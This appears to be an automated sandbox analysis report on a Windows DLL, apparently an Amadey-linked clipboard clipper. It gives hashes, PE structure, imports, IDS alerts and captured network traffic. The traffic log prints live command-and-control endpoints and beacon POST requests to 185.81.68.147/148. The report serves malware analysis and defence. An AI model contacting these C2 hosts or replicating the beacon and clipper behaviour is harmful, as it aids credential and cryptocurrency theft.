s-part-0035.t-0009.t-msedge.net	file.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	file.exe	Get hash	malicious	Stealc	Browse	13.107.246.63
	CMR ART009.docx	Get hash	malicious	Unknown	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	13.107.246.63
	RFQ3978 39793980.pdf.exe	Get hash	malicious	FormBook	Browse	13.107.246.63
	TKuVlZfZngP6kV3.exe	Get hash	malicious	FormBook	Browse	13.107.246.63
	RFQ3978 39793980.pdf.exe	Get hash	malicious	FormBook	Browse	13.107.246.63
	SwiftCopy_PaymtRecpt121224.exe	Get hash	malicious	Remcos	Browse	13.107.246.63
	original.eml	Get hash	malicious	Unknown	Browse	13.107.246.63
	file.exe	Get hash	malicious	Unknown	Browse	13.107.246.63

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
KLNOPT-ASFI	hoPazBDFG9.dll	Get hash	malicious	Amadey	Browse	185.81.68.148
	tOuVwTJrau.exe	Get hash	malicious	Amadey	Browse	185.81.68.148
	eHCgK6fZc2.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	yINR7uQlPr.exe	Get hash	malicious	Amadey, RedLine	Browse	185.81.68.148
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar	Browse	185.81.68.147
	tjpq0h4wEH.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
KLNOPT-ASFI	hoPazBDFG9.dll	Get hash	malicious	Amadey	Browse	185.81.68.148
	tOuVwTJrau.exe	Get hash	malicious	Amadey	Browse	185.81.68.148
	eHCgK6fZc2.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	yINR7uQlPr.exe	Get hash	malicious	Amadey, RedLine	Browse	185.81.68.148
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar	Browse	185.81.68.147
	tjpq0h4wEH.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.36076412023942
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	D72j5I83wU.dll
File size:	126'976 bytes
MD5:	c2f3fbbbe6d5f48a71b6b168b1485866
SHA1:	1cd56cfc2dc07880b65bd8a1f5b7147633f5d553
SHA256:	c7ed512058bc924045144daa16701da10f244ac12a5ea2de901e59dce6470839
SHA512:	e211f18c2850987529336e0d20aa894533c1f6a8ae6745e320fd394a9481d3a956c719ac29627afd783e36e5429c0325b98e60aee2a830e75323c276c72f845a
SSDEEP:	3072:Vdu5ZXB8ZuzQT7SgmME8Yn/YoZ3SNqpidU1epf:WjGymSg7E8Y3Z3AdUwpf
TLSH:	2BC34B213496C031D66D567E18A8ABF487BD6810DFB00DD77B840E7B8E642D2EE34D7A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P............................................................................@.......@.......@.~.....@.......Rich...........

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x10007062
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x675A9684 [Thu Dec 12 07:53:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	fdb088ba51afbf555d7a0f495212d8f1

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F53FC835347h
call 00007F53FC83571Ah
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F53FC8351F3h
add esp, 0Ch
pop ebp
retn 000Ch
jmp 00007F53FC839062h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F53FC8348F5h
push 1001C6E0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F53FC835DADh
int3
push ebp
mov ebp, esp
and dword ptr [1001F708h], 00000000h
sub esp, 24h
or dword ptr [1001E00Ch], 01h
push 0000000Ah
call dword ptr [10016050h]
test eax, eax
je 00007F53FC8354EFh
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-1Ch]
mov dword ptr [ebp-0Ch], eax
xor edi, 6C65746Eh
mov eax, dword ptr [ebp-18h]
xor eax, 49656E69h
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp-20h]
xor eax, 756E6547h
mov dword ptr [ebp-04h], eax
xor eax, eax
inc eax
push ebx
cpuid
mov esi, ebx
pop ebx
lea ebx, dword ptr [ebp-24h]
mov dword ptr [ebx], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebx+04h], esi
or eax, edi
or eax, dword ptr [ebp-08h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1cd10	0x9c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1cdac	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x20000	0xf8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x21000	0x1af8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1bb84	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1bbc0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x16000	0x14c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x14306	0x14400	60ab5dc3d05117ecdfe5887a3e8a7c70	False	0.5100188078703703	data	6.54336981394925	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x16000	0x752a	0x7600	08220ccdb3fd3e6b2a37ef117d10551b	False	0.4294226694915254	data	5.16092989937922	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1e000	0x1fec	0x1400	070ceab71158e4b98b9fbb2974a658d3	False	0.094140625	data	1.5445177251659354	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x20000	0xf8	0x200	9f59a1f7f3b6dfefbfe8605086b5888e	False	0.333984375	data	2.5080557656497993	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x21000	0x1af8	0x1c00	f0da6f5f3bd34741cc0954192c9cb82c	False	0.7540457589285714	data	6.518393643652914	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x20060	0x91	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.8689655172413793

Imports

DLL	Import
KERNEL32.dll	GlobalAlloc, GlobalLock, GlobalUnlock, WideCharToMultiByte, Sleep, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetProcessHeap, GetStdHandle, GetFileType, GetStringTypeW, DecodePointer
USER32.dll	EmptyClipboard, SetClipboardData, CloseClipboard, GetClipboardData, OpenClipboard
WININET.dll	InternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetCloseHandle

Exports

Name	Ordinal	Address
??4CClipperDLL@@QAEAAV0@$$QAV0@@Z	1	0x10001d60
??4CClipperDLL@@QAEAAV0@ABV0@@Z	2	0x10001d60
Main	3	0x100059a0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-13T07:56:37.610787+0100	2856151	ETPRO MALWARE Amadey CnC Activity M7	1	192.168.2.10	49726	185.81.68.148	80	TCP
2024-12-13T07:56:40.220798+0100	2856151	ETPRO MALWARE Amadey CnC Activity M7	1	192.168.2.10	49733	185.81.68.148	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 07:56:34.548268080 CET	49720	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:56:34.667948961 CET	80	49720	185.81.68.147	192.168.2.10
Dec 13, 2024 07:56:34.668029070 CET	49720	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:56:34.668230057 CET	49720	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:56:34.789043903 CET	80	49720	185.81.68.147	192.168.2.10
Dec 13, 2024 07:56:36.079030991 CET	80	49720	185.81.68.147	192.168.2.10
Dec 13, 2024 07:56:36.079087973 CET	49720	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:56:36.082289934 CET	49726	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:56:36.202094078 CET	80	49726	185.81.68.148	192.168.2.10
Dec 13, 2024 07:56:36.202202082 CET	49726	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:56:36.202471972 CET	49726	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:56:36.322279930 CET	80	49726	185.81.68.148	192.168.2.10
Dec 13, 2024 07:56:37.179600954 CET	49727	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:56:37.301012039 CET	80	49727	185.81.68.147	192.168.2.10
Dec 13, 2024 07:56:37.301105976 CET	49727	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:56:37.301306009 CET	49727	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:56:37.420912027 CET	80	49727	185.81.68.147	192.168.2.10
Dec 13, 2024 07:56:37.610637903 CET	80	49726	185.81.68.148	192.168.2.10
Dec 13, 2024 07:56:37.610786915 CET	49726	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:56:38.691873074 CET	80	49727	185.81.68.147	192.168.2.10
Dec 13, 2024 07:56:38.692049980 CET	49727	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:56:38.694798946 CET	49733	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:56:38.814544916 CET	80	49733	185.81.68.148	192.168.2.10
Dec 13, 2024 07:56:38.814677000 CET	49733	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:56:38.832393885 CET	49733	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:56:38.952199936 CET	80	49733	185.81.68.148	192.168.2.10
Dec 13, 2024 07:56:40.220700979 CET	80	49733	185.81.68.148	192.168.2.10
Dec 13, 2024 07:56:40.220798016 CET	49733	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:56:41.077640057 CET	80	49720	185.81.68.147	192.168.2.10
Dec 13, 2024 07:56:41.077738047 CET	49720	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:56:42.609781027 CET	80	49726	185.81.68.148	192.168.2.10
Dec 13, 2024 07:56:42.610193014 CET	49726	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:56:43.688345909 CET	80	49727	185.81.68.147	192.168.2.10
Dec 13, 2024 07:56:43.688453913 CET	49727	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:56:45.219563961 CET	80	49733	185.81.68.148	192.168.2.10
Dec 13, 2024 07:56:45.219628096 CET	49733	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:58:24.511985064 CET	49720	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:58:24.512037039 CET	49726	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:58:24.824276924 CET	49720	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:58:24.839687109 CET	49726	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:58:25.433484077 CET	49720	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:58:25.480385065 CET	49726	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:58:26.652271032 CET	49720	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:58:26.765198946 CET	49726	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:58:27.126458883 CET	49733	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:58:27.126553059 CET	49727	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:58:27.433430910 CET	49733	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:58:27.464689970 CET	49727	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:58:28.058532953 CET	49733	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:58:28.136555910 CET	49727	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:58:29.089698076 CET	49720	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:58:29.292851925 CET	49733	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:58:29.324090958 CET	49726	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:58:29.480312109 CET	49727	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:58:31.745951891 CET	49733	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:58:32.152317047 CET	49727	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:58:33.964689016 CET	49720	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:58:34.418349981 CET	49726	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:58:36.636746883 CET	49733	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:58:37.480428934 CET	49727	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:58:43.699106932 CET	49720	80	192.168.2.10	185.81.68.147
Dec 13, 2024 07:58:44.605370045 CET	49726	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:58:46.402229071 CET	49733	80	192.168.2.10	185.81.68.148
Dec 13, 2024 07:58:48.136671066 CET	49727	80	192.168.2.10	185.81.68.147

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 07:56:25.984850883 CET	1.1.1.1	192.168.2.10	0x4a7b	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 07:56:25.984850883 CET	1.1.1.1	192.168.2.10	0x4a7b	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

185.81.68.147

185.81.68.148

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49720	185.81.68.147	80	8076	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:56:34.668230057 CET	156	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Dec 13, 2024 07:56:36.079030991 CET	711	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:56:35 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 512 Content-Type: text/html; charset=UTF-8 Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED] Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49726	185.81.68.148	80	8076	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:56:36.202471972 CET	159	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Dec 13, 2024 07:56:37.610637903 CET	711	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:56:36 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 512 Content-Type: text/html; charset=UTF-8 Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED] Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49727	185.81.68.147	80	6872	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:56:37.301306009 CET	156	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Dec 13, 2024 07:56:38.691873074 CET	711	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:56:37 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 512 Content-Type: text/html; charset=UTF-8 Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED] Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49733	185.81.68.148	80	6872	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:56:38.832393885 CET	159	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Dec 13, 2024 07:56:40.220700979 CET	711	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:56:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 512 Content-Type: text/html; charset=UTF-8 Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED] Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-

Target ID:	0
Start time:	01:56:26
Start date:	13/12/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll"
Imagebase:	0x190000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:56:26
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
